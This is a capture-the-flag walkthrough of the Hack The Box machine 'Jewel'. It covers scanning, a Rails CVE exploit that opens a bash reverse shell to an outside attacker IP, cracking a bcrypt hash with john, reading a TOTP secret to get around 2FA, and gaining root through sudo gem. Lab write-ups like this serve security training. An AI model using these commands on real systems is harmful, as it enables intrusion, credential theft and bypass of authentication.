Prerequisite
Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.
echo "10.10.10.211 jewel.htb" >> /etc/hosts
hosts file entry
Okay now onto the hacking!
Reconnaissance
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -A -p- -oN initial jewel.htb
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA) | 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA) |_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519) 8000/tcp open http Apache httpd 2.4.38 |http-generator: gitweb/2.20.1 git/2.20.1 | http-methods: | Supported Methods: GET HEAD POST OPTIONS | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.38 (Debian) | http-title: jewel.htb Git |_Requested resource was jewel.htb:8000/gitweb 8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6) |http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E | http-methods: | Supported Methods: GET HEAD POST OPTIONS |_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6 |_http-title: BL0G!
Scanning & Enumeration
Based on the scan that was run, I realized that port 8000 was running a web server. This was the web app that was being served!
Enumerating further revealed the app that was running and its version.
- Rails = V 5.2.2.1
I was able to find an existing CVE for this version of rails and a POC.
Exploitation
With the help of the POC, I was able to gain a minimal shell on the remote box that was running rails 5.2.2.1.
First I had to create an account on the blog which was running on port 8080
Once I had that account created, I was ready to run the exploit.
┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel] └─# python3 exploit.py 10.10.10.211 8080 hello@neeranjan.com nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"
User.txt flag
I was able to gain a stable shell to the user account.
Privilege Escalation
For this, I utilized Linpeas as I always do! The privesc script returned a password hash belonging to bill.
[+] Searching specific hashes inside files - less false positives (limit 70) /home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
I headed off to crack the password with my trusty dictionary from seclists and good ol' john!
┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel] └─# john password.hash -w=passwd.dict
Followed by that, I tried to run sudo -l to see what binaries.
However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a .google_authenticator file in the home directory of bill.
bill@jewel:~$ cat .google_authenticator 2UQI3R52WFCLE6JTLDCSJYMJH4 " WINDOW_SIZE 17 " TOTP_AUTH
I then activated the authenticator on my phone and was able to get it working!~
And finally, I was able to run sudo -l using bill's account without any issues.
Now that I knew bill could run gem with sudo privileges, all there was left to do was head to GTFObins and get root!
sudo gem open -e "/bin/sh -c /bin/sh" rdoc
rooty!